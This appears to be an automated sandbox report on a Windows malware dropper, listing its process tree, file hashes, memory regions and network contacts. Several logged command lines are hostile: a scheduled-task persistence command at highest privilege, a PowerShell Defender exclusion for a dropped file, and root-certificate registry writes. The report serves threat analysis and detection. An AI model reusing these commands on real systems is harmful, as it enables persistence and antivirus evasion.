| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c caa4baaf544.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 621c13b77.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
24ebc9ce784c63.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe
621c13b77.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe
caa4baaf544.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe
6f1aa71747b4a291.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe
3d1f9c2a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe
09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe
e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe
d55cc0d45c3a05.exe
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe
"C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 572 -s 272
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2576 -s 424
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2776 -s 964
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSBA69.tmp\Install.cmd" "
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2376 CREDAT:275457 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 172.67.75.166:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| N/A | 127.0.0.1:49291 | tcp | |
| N/A | 127.0.0.1:49293 | tcp | |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| SG | 37.0.11.8:80 | tcp | |
| US | 8.8.8.8:53 | crl.microsoft.com | udp |
| GB | 184.50.113.144:80 | crl.microsoft.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 72.246.29.11:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | tcp | |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| GB | 142.250.178.3:80 | c.pki.goog | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| LV | 45.142.213.135:30058 | tcp |
Files
\Users\Admin\AppData\Local\Temp\7zS406F7727\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
memory/2576-35-0x000000006FE40000-0x000000006FFC6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/2576-31-0x000000006B440000-0x000000006B4CF000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
memory/2576-28-0x000000006B280000-0x000000006B2A6000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\6f1aa71747b4a291.exe
| MD5 | 2b32e3fb6d4deb5e9f825f9c9f0c75a6 |
| SHA1 | 2049fdbbe5b72ff06a7746b57582c9faa6186146 |
| SHA256 | 8bd8f7a32de3d979cae2f487ad2cc5a495afa1bfb1c740e337c47d1e2196e1f2 |
| SHA512 | ad811d1882aa33cce0ebbab82e3f2db7596f88392cd9c142aef0b0caa4004afcf0253f25e7a8f228778dd3a2ec43d2028985a3e85807438c5bed3ae4709f9cfa |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\24ebc9ce784c63.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\caa4baaf544.exe
| MD5 | 3f9f7dfccefb41726d6b99e434155467 |
| SHA1 | f5a7b26fb2aa6ebb7177b30b24a7fdbc067de8f1 |
| SHA256 | 37342babfd23ab30837a55886012a5125c69d2e5f883dadfc06a42cfb28e5b34 |
| SHA512 | e0ac41a8c91e8521c8ce46444299c892335af5bfce7683abb915d8ede4f7638e9e76bbd9474fffa3f12cbc11725790b4be82d856aadd55027e8186bc1b6c1762 |
memory/2576-48-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2576-47-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2576-46-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2576-45-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2576-44-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2576-43-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2576-42-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2576-41-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2576-40-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/776-90-0x0000000001150000-0x000000000117C000-memory.dmp
memory/1696-89-0x0000000000870000-0x0000000000878000-memory.dmp
\Users\Admin\AppData\Local\Temp\7zS406F7727\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
C:\Users\Admin\AppData\Local\Temp\7zS406F7727\09b9624c6ac9.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\e4f0738cc5646a38.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
\Users\Admin\AppData\Local\Temp\7zS406F7727\d55cc0d45c3a05.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
memory/776-127-0x0000000000240000-0x0000000000246000-memory.dmp
memory/776-128-0x0000000000500000-0x0000000000520000-memory.dmp
memory/776-129-0x0000000000250000-0x0000000000256000-memory.dmp
memory/2884-130-0x0000000000860000-0x000000000094E000-memory.dmp
memory/2992-131-0x00000000012E0000-0x0000000001422000-memory.dmp
memory/2144-137-0x000000013FF50000-0x000000013FF60000-memory.dmp
memory/868-140-0x0000000000740000-0x0000000000824000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | 01ad10e59fa396af2d5443c5a14c1b21 |
| SHA1 | f209a4f0bb2a96e3ee6a55689e7f00e79c04f722 |
| SHA256 | bef1cffaba8186ce62265e0b322ca9fd9326a8929591df569a4953456c752137 |
| SHA512 | 1e067ade999ff933a644fde66c6ab9abb8a960ce1c8064368adcde4c09d924bd22d1b43c68b7c968e982fc75937969a2876e9e2a024f72e693f9ba397d449e02 |
memory/1972-151-0x00000000004D0000-0x00000000005B4000-memory.dmp
memory/2992-164-0x0000000000520000-0x0000000000532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab18B1.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\Tar18C3.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/2776-211-0x0000000000400000-0x0000000003346000-memory.dmp
memory/2576-217-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2576-216-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2576-215-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2576-214-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2576-213-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2576-212-0x0000000000400000-0x0000000000A07000-memory.dmp
memory/572-218-0x0000000000400000-0x00000000032F3000-memory.dmp
memory/2576-226-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2576-224-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2576-221-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2576-220-0x0000000000400000-0x0000000000A07000-memory.dmp
memory/2576-228-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2576-227-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2144-229-0x0000000000150000-0x000000000015E000-memory.dmp
C:\Users\Admin\AppData\Roaming\services64.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
| SHA512 | 2fba342010ba85440784190245f74ea9e7c70974df12c241ccb6b72a6e1006a72bd1fa2e657f434d7479758f9508edb315398f6e95d167a78b788cea732be3b7 |
memory/2588-233-0x000000013FCA0000-0x000000013FCB0000-memory.dmp
memory/2992-234-0x000000000A950000-0x000000000A9DC000-memory.dmp
memory/2992-235-0x00000000009F0000-0x0000000000A0E000-memory.dmp
memory/868-245-0x0000000000400000-0x000000000041E000-memory.dmp
memory/868-244-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/868-242-0x0000000000400000-0x000000000041E000-memory.dmp
memory/868-240-0x0000000000400000-0x000000000041E000-memory.dmp
memory/868-238-0x0000000000400000-0x000000000041E000-memory.dmp
memory/868-236-0x0000000000400000-0x000000000041E000-memory.dmp
memory/868-247-0x0000000000400000-0x000000000041E000-memory.dmp
